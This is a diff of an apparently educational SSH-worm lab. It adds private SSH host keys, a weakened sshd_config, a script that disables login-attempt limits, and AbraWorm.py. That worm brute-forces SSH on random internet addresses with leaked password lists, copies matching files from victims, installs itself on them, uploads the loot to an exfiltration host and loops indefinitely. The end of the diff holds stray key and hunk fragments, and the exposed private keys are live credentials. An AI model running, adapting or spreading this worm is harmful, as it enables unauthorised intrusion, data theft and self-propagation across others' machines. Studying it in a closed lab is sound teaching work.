+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACAOvTrEihdSh3hCS8fp2/nj8W0HKI4gGjQeRz5W0lPLFgAAAKD7c6Ab+3Og
+GwAAAAtzc2gtZWQyNTUxOQAAACAOvTrEihdSh3hCS8fp2/nj8W0HKI4gGjQeRz5W0lPLFg
+AAAEB/Lxu1xdaGLKbXr00dXVo1KrIzfa4Fmj1QnO81cfFHJg69OsSKF1KHeEJLx+nb+ePx
+bQcojiAaNB5HPlbSU8sWAAAAGHJvb3RAb3BlbnNzaC1zZXJ2ZXItdXNlcgECAwQF
+-----END OPENSSH PRIVATE KEY-----
--- a/user/config/ssh_host_keys/ssh_host_ed25519_key.pub
+++ b/user/config/ssh_host_keys/ssh_host_ed25519_key.pub
@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA69OsSKF1KHeEJLx+nb+ePxbQcojiAaNB5HPlbSU8sW root@openssh-server-user
--- a/user/config/ssh_host_keys/ssh_host_rsa_key
+++ b/user/config/ssh_host_keys/ssh_host_rsa_key
@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
--- a/user/config/ssh_host_keys/ssh_host_rsa_key.pub
+++ b/user/config/ssh_host_keys/ssh_host_rsa_key.pub
@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDlU+Q6ZsGursA2jxbrBmoQycbdZHdJ+YubhYupDJMGECgE9YhmB92tn2eH3K1O7BEdSDHav5hnzid/2T24+RROj0XlbKXqurTirFqhqhH7pS4PdeFDZWecArFJPJ+n33C5F9KBxBHi1LX1DSN6yryf8E9ajjxd7BO+bOJ6W7E1YCgcpfkt0tRSk6vGzrXnaLP3GTQbmpmo4LVWq7rTv7bFNunHeD4KYtwDuyW+2rJLdwWxT4j0pbkD3bShN74198JIqHa4SSnPkT3ia2nLsayJckyWDjLvqdTe9auuisPHiuH9Z2E9sDIWCzfEQlpupqxvpw3SYvyM4d7Avhfy0cWocy8IKItWvJpS36laWW5MBFxUh180FMeMeQVzOfbFmFFkAbif0NoGe2ub1mBUgRXRgAM2A3WnonpLmHzcRn+yAabFX3tMABe4DEeZ+6t0zehGESsVCRdohh7wLePUY9hhwoDQM43nTw3L+B6f6G+TPykTyLPwBgEOMNHKmERv5CM= root@openssh-server-user
--- a/user/config/ssh_host_keys/sshd_config
+++ b/user/config/ssh_host_keys/sshd_config
@ -0,0 +1,117 @@
+#	$OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $
+
+# This is the sshd server system-wide configuration file.  See
+# sshd_config(5) for more information.
+
+# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+# The strategy used for options in the default sshd_config shipped with
+# OpenSSH is to specify options with their default value where
+# possible, but leave them commented.  Uncommented options override the
+# default value.
+
+Port 2222
+#AddressFamily any
+#ListenAddress 0.0.0.0
+#ListenAddress ::
+
+#HostKey /etc/ssh/ssh_host_rsa_key
+#HostKey /etc/ssh/ssh_host_ecdsa_key
+#HostKey /etc/ssh/ssh_host_ed25519_key
+
+# Ciphers and keying
+#RekeyLimit default none
+
+# Logging
+#SyslogFacility AUTH
+#LogLevel INFO
+
+# Authentication:
+
+#LoginGraceTime 2m
+#PermitRootLogin prohibit-password
+#StrictModes yes
+#MaxAuthTries 2147483647
+#MaxSessions 10
+
+#PubkeyAuthentication yes
+
+# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
+# but this is overridden so installations will only check .ssh/authorized_keys
+AuthorizedKeysFile	.ssh/authorized_keys
+
+#AuthorizedPrincipalsFile none
+
+#AuthorizedKeysCommand none
+#AuthorizedKeysCommandUser nobody
+
+# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
+#HostbasedAuthentication no
+# Change to yes if you don't trust ~/.ssh/known_hosts for
+# HostbasedAuthentication
+#IgnoreUserKnownHosts no
+# Don't read the user's ~/.rhosts and ~/.shosts files
+#IgnoreRhosts yes
+
+# To disable tunneled clear text passwords, change to no here!
+PasswordAuthentication yes
+#PermitEmptyPasswords no
+
+# Change to no to disable s/key passwords
+#KbdInteractiveAuthentication yes
+
+# Kerberos options
+#KerberosAuthentication no
+#KerberosOrLocalPasswd yes
+#KerberosTicketCleanup yes
+#KerberosGetAFSToken no
+
+# GSSAPI options
+#GSSAPIAuthentication no
+#GSSAPICleanupCredentials yes
+
+# Set this to 'yes' to enable PAM authentication, account processing,
+# and session processing. If this is enabled, PAM authentication will
+# be allowed through the KbdInteractiveAuthentication and
+# PasswordAuthentication.  Depending on your PAM configuration,
+# PAM authentication via KbdInteractiveAuthentication may bypass
+# the setting of "PermitRootLogin prohibit-password".
+# If you just want the PAM account and session checks to run without
+# PAM authentication, then enable this but set PasswordAuthentication
+# and KbdInteractiveAuthentication to 'no'.
+#UsePAM no
+
+#AllowAgentForwarding yes
+# Feel free to re-enable these if your use case requires them.
+AllowTcpForwarding no
+GatewayPorts no
+X11Forwarding no
+#X11DisplayOffset 10
+#X11UseLocalhost yes
+#PermitTTY yes
+#PrintMotd yes
+#PrintLastLog yes
+#TCPKeepAlive yes
+#PermitUserEnvironment no
+#Compression delayed
+#ClientAliveInterval 0
+#ClientAliveCountMax 3
+#UseDNS no
+PidFile /config/sshd.pid
+#MaxStartups 10:30:100
+#PermitTunnel no
+#ChrootDirectory none
+#VersionAddendum none
+
+# no default banner path
+#Banner none
+
+# override default of no subsystems
+Subsystem	sftp	internal-sftp
+
+# Example of overriding settings on a per-user basis
+#Match User anoncvs
+#	X11Forwarding no
+#	AllowTcpForwarding no
+#	PermitTTY no
+#	ForceCommand cvs server
--- a/user/config/sshd.pid
+++ b/user/config/sshd.pid
@ -0,0 +1 @@
+175
--- a/user/config/test.txt
+++ b/user/config/test.txt
@ -0,0 +1,2 @@
+abracadabra
+File di esempio che verrebbe esfiltrato
--- a/user/init-scripts/disable-maxauth.sh
+++ b/user/init-scripts/disable-maxauth.sh
@ -0,0 +1,4 @@
+#!/bin/bash
+
+echo "*** DISABLING MaxAuthTries ***"
+sed -i 's/MaxAuthTries .*/MaxAuthTries 2147483647/g' /etc/ssh/sshd_config
--- a/worm/AbraWorm.py
+++ b/worm/AbraWorm.py
@ -0,0 +1,285 @@
+#!/usr/bin/env python
+
+### AbraWorm.py
+
+### Author: Avi kak (kak@purdue.edu)
+### Date:   April 8, 2016
+
+##  This is a harmless worm meant for educational purposes only.  It can
+##  only attack machines that run SSH servers and those too only under 
+##  very special conditions that are described below. Its primary features 
+##  are:
+##
+##  -- It tries to break in with SSH login into a randomly selected set of
+##     hosts with a randomly selected set of usernames and with a randomly
+##     chosen set of passwords. 
+##
+##  -- If it can break into a host, it looks for the files that contain the
+##     string `abracadabra'.  It downloads such files into the host where
+##     the worm resides.
+##
+##  -- It uploads the files thus exfiltrated from an infected machine to a
+##     designated host in the internet. You'd need to supply the IP address
+##     and login credentials at the location marked yyy.yyy.yyy.yyy in the
+##     code for this feature to work.  The exfiltrated files would be 
+##     uploaded to the host at yyy.yyy.yyy.yyy. If you don't supply this
+##     information, the worm will still work, but now the files exfiltrated
+##     from the infected machines will stay at the host where the worm
+##     resides.  For an actual worm, the host selected for yyy.yyy.yyy.yyy
+##     would be a previosly infected host.
+##
+##  -- It installs a copy of itself on the remote host that it successfully
+##     breaks into.  If a user on that machine executes the file thus
+##     installed (say by clicking on it), the worm activates itself on
+##     that host.
+##
+##  -- Once the worm is launched in an infected host, it runs in an
+##     infinite loop, looking for vulnerable hosts in the internet.  By
+##     vulnerable I mean the hosts for which it can successfully guess at
+##     least one username and the corresponding password.
+##
+##  -- IMPORTANT: After the worm has landed in a remote host, the worm can
+##     be activated on that machine only if Python is installed on that
+##     machine.  Another condition that must hold at the remote machine is
+##     that it must have the Python modules paramiko and scp installed.
+##
+##  -- The username and password construction strategies used in the worm
+##     are highly unlikely to result in actual usernames and actual 
+##     passwords anywhere.  (However, for demonstrating the worm code in
+##     an educational program, this part of the code can be replaced with
+##     a more potent algorithm.)
+##
+##  -- Given all of the conditions I have listed above for this worm to
+##     propagate into the internet, we can be quite certain that it is not
+##     going to cause any harm.  Nonetheless, the worm should prove useful
+##     as an educational exercise.
+##
+##
+##  If you want to play with the worm, run it first in the `debug' mode. 
+##  For the debug mode of execution, you would need to supply the following
+##  information to the worm:
+##
+##  1)   Change to 1 the value of the variable $debug.  
+##
+##  2)   Provide an IP address and the login credentials for a host that you
+##       have access to and that contains one or more documents that
+##       include the string "abracadabra".  This information needs to go
+##       where you see xxx.xxx.xxx.xxx in the code.
+##
+##  3)   Provide an IP address and the login credentials for a host that 
+##       will serve as the destination for the files exfiltrated from the
+##       successfully infected hosts. The IP address and the login 
+##       credentials go where you find the string yyy.yyy.yyy.yyy in the 
+##       code.
+##
+##  After you have executed the worm code, you will notice that a copy of
+##  the worm has landed at the host at the IP address you used for
+##  xxx.xxx.xxx.xxx and you'll see a new directory at the host you used for
+##  yyy.yyy.yyy.yyy.  This directory will contain those files from the
+##  xxx.xxx.xxx.xxx host that contained the string `abracadabra'.
+
+import sys
+import os
+import random
+import paramiko
+import scp
+import select
+import signal
+import requests
+import time
+
+users = None
+passwords = None
+
+
+##   You would want to uncomment the following two lines for the worm to 
+##   work silently:
+#sys.stdout = open(os.devnull, 'w')
+#sys.stderr = open(os.devnull, 'w')
+
+def sig_handler(signum,frame): os.kill(os.getpid(),signal.SIGKILL)
+signal.signal(signal.SIGINT, sig_handler)
+
+debug = 1      # IMPORTANT:  Before changing this setting, read the last
+               #             paragraph of the main comment block above. As
+               #             mentioned there, you need to provide two IP
+               #             addresses in order to run this code in debug 
+               #             mode. 
+
+##  The following numbers do NOT mean that the worm will attack only 3
+##  hosts for 3 different usernames and 3 different passwords.  Since the
+##  worm operates in an infinite loop, at each iteration, it generates a
+##  fresh batch of hosts, usernames, and passwords.
+NHOSTS = NUSERNAMES = NPASSWDS = 3
+
+def get_password_list():
+    if debug == 1: return ['password', 'adjfhfad', 'idhf', 'dhf931f']
+    r = requests.get('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt')
+    return r.text.split('\n')
+
+def get_user_list():
+    if debug == 1: return ['test', 'user', 'mario', 'matteo']
+    r = requests.get('https://raw.githubusercontent.com/jeanphorn/wordlist/master/usernames.txt')
+    return r.text.split("\n")
+
+def get_new_usernames(how_many):
+    global users
+    if debug == 1: return ["admin", "account", "vagrant", "kali", "user", "adaliah", "adversary"]
+    if how_many == 0: return 0
+    users = users if users else get_user_list()
+    return random.sample(users,how_many)
+
+def get_new_passwds(how_many):
+    global passwords
+    if how_many == 0: return 0
+    passwords = passwords if passwords else get_password_list()
+    if debug == 1: return passwords[:100]
+    return random.sample(passwords,how_many)
+
+def get_fresh_ipaddresses(how_many):
+    if debug == 1: return ["127.0.0.1"]
+    if how_many == 0: return 0
+    ipaddresses = []
+    for i in range(how_many):
+        first,second,third,fourth = map(lambda x: str(1 + random.randint(0,x)), [223,223,223,223])
+        ipaddresses.append( first + '.' + second + '.' + third + '.' + fourth )
+    return ipaddresses 
+
+def run_ssh_command(ssh, cmd):
+
+    _, stdout_, stderr_ = ssh.exec_command(cmd)
+
+    stdout_.channel.recv_exit_status()
+    stderr_.channel.recv_exit_status()
+
+    out = stdout_.readlines()
+    err = stderr_.readlines()
+
+    if debug == 1:
+        print(f'\tstdout:{out}')
+        if len(stderr_.readlines()) > 0: 
+            print(f'\tstderr:{err}')
+            return []
+
+    return out
+
+# For the same IP address, we do not want to loop through multiple user 
+# names and passwords consecutively since we do not want to be quarantined 
+# by a tool like DenyHosts at the other end.  So let's reverse the order 
+# of looping.
+def main():
+    while True:
+        usernames = get_new_usernames(NUSERNAMES)
+        passwds =   get_new_passwds(NPASSWDS)
+        #    print("usernames: %s" % str(usernames))
+        #    print("passwords: %s" % str(passwds))
+            # First loop over passwords
+        for passwd in passwds:
+            # Then loop over user names
+            for user in usernames:
+                # And, finally, loop over randomly chosen IP addresses
+                for ip_address in get_fresh_ipaddresses(NHOSTS):
+                    host = f'{user}@{ip_address}'
+                    print(f'{host} -> {passwd}')
+                    files_of_interest_at_target = []
+                    try:
+                        ssh = paramiko.SSHClient()
+                        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+                        ssh.connect(ip_address,port=22,username=user,password=passwd,timeout=5)
+                        print(f'Connected {user}@{ip_address} -> {passwd}')
+    
+                        # Let's make sure that the target host was not previously 
+                        # infected:
+                        received_list = None
+                        cmd = 'ls'
+                        print(f'[{host}] executing: {cmd}')
+                        received_list = run_ssh_command(ssh, cmd)
+                        
+                        if not received_list:
+                            next
+                        
+                        print(f'Checking if target is already infected')
+                        if debug == 1: time.sleep(5)
+                        if ''.join(received_list).find('AbraWorm') >= 0: 
+                            print(f'{host} already infected, found AbraWorm in {received_list}')   
+                            next
+                        else:
+                            print(f'{host} not infected')
+    
+                        # Now let's look for files that contain the string 'abracadabra'
+                        cmd = 'grep -ls abracadabra *'
+                        print(f'Checking for interesting files')
+                        print(f'[{host}] executing: {cmd}')
+                        if debug == 1: time.sleep(5)
+                        received_list = run_ssh_command(ssh, cmd)
+    
+                        if not received_list:
+                            next
+    
+                        for item in received_list:
+                            files_of_interest_at_target.append(item.strip())
+                        print(f'Files of interest at the target: {files_of_interest_at_target}')
+                        if debug == 1: time.sleep(5)
+    
+                        scpcon = scp.SCPClient(ssh.get_transport())
+                        if len(files_of_interest_at_target) > 0:
+                            for target_file in files_of_interest_at_target:
+                                print(f'[DEBUG] Copy file {target_file}')
+                                if debug == 1: time.sleep(5)
+                                scpcon.get(target_file)
+    
+                        # Now deposit a copy of AbraWorm.py at the target host:
+                        print(f'[DEBUG] Copy AbraWorm in target')
+                        scpcon.put(sys.argv[0])        
+                        scpcon.close()
+                        if debug == 1: time.sleep(5)
+
+                        print(f'[DEBUG] Cheking {host} for worm deploy, executing: {cmd}')
+                        received_list = run_ssh_command(ssh, cmd)
+                        print(f'{received_list}')
+                        if debug == 1: time.sleep(5)
+
+                    except Exception as e:
+                        print(f'Exception catched: {e}')
+                        next
+    
+                    # Now upload the exfiltrated files to a specially designated host,
+                    # which can be a previously infected host.  The worm will only 
+                    # use those previously infected hosts as destinations for 
+                    # exfiltrated files if it was able to send the login credentials
+                    # used on those hosts to its human masters through, say, a 
+                    # secret IRC channel. (See Lecture 29 on IRC)
+                    if len(files_of_interest_at_target) > 0:
+                        print(f'Will now try to exfiltrate the files')
+                        if debug == 1: time.sleep(5)
+                        try:
+                            ssh = paramiko.SSHClient()
+                            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+                            
+                            #  For exfiltration demo to work, you must provide an IP address and the login 
+                            #  credentials in the next statement:
+                            ssh.connect('127.0.0.1',port=12345,username='seed',password='dees',timeout=5)
+                            scpcon = scp.SCPClient(ssh.get_transport())
+                            print(f'Connected to exhiltration host')
+    
+                            for filename in files_of_interest_at_target:
+                                scpcon.put(filename)
+                            scpcon.close()
+
+                            if debug == 1: time.sleep(5)
+                            print(f'Summary')
+                            print(f'Extracting file:')
+                            for filename in files_of_interest_at_target:
+                                print(f'- {filename}')
+
+
+                        except: 
+                            print("No uploading of exfiltrated files\n")
+                            next
+
+                        if debug == 1:
+                            return
+
+
+if __name__ == "__main__":
+    main()
				`@ -0,0 +1 @@`
				`The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension`
				`@ -0,0 +1 @@`
				`ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmPjDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13s= root@openssh-server-attacker`
				`@ -0,0 +1 @@`
				`ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA65Uqg19LAOOYq553HDjJH/42zbg3Q4PGpjvQrzN8f/ root@openssh-server-attacker`
				`@ -0,0 +1 @@`
				ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJHsaQ6y/OHM8pmezG5Tj3MIcoDWMutJumf7vXoShepoRDO30+r4Wf0yuPIYgtAFH4LpZ5u9/obi93y9IiY7WpACoNEOWwOGUEI1+BPvQh2IQoNE1JndGf74+H7jQVd4weg7/vKYxsO1SD8ypLGO+TL1DnCH15qN9zr63tEzWC7+l06PTnJNv9rXOSI4PjyJ42rVj7GXqYfm5wFXVnGXcq8dOeoIHPWwkSwm9YriKjtykNFcu5lEpgCGqz6wfDyEnGtIZoQaTDzs6bkhzycrFXSvHxhh+LlRNDGhTgCo8Kt43M4wFIe6q+7LVUEDab6CWn+hGhixqfsG0GSGQzTM5XPg1byXbq7pocxoeKguQJZi6pGywBhl+lfEvY2riLQJwFa83xewVPaUavQ0SIc5HOrDWY/9Xor+ITyTF5hrK6kdTCc3p6MjktlWSFkHUJrnj7naDLjitKhTqcCVPuCvtoRlmtTbTN+Imbi9+Fiel2MyeFTcCSAzCPu1a+sklr/L0= root@openssh-server-attacker
				`@ -0,0 +1 @@`
				ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDlU+Q6ZsGursA2jxbrBmoQycbdZHdJ+YubhYupDJMGECgE9YhmB92tn2eH3K1O7BEdSDHav5hnzid/2T24+RROj0XlbKXqurTirFqhqhH7pS4PdeFDZWecArFJPJ+n33C5F9KBxBHi1LX1DSN6yryf8E9ajjxd7BO+bOJ6W7E1YCgcpfkt0tRSk6vGzrXnaLP3GTQbmpmo4LVWq7rTv7bFNunHeD4KYtwDuyW+2rJLdwWxT4j0pbkD3bShN74198JIqHa4SSnPkT3ia2nLsayJckyWDjLvqdTe9auuisPHiuH9Z2E9sDIWCzfEQlpupqxvpw3SYvyM4d7Avhfy0cWocy8IKItWvJpS36laWW5MBFxUh180FMeMeQVzOfbFmFFkAbif0NoGe2ub1mBUgRXRgAM2A3WnonpLmHzcRn+yAabFX3tMABe4DEeZ+6t0zehGESsVCRdohh7wLePUY9hhwoDQM43nTw3L+B6f6G+TPykTyLPwBgEOMNHKmERv5CM= root@openssh-server-user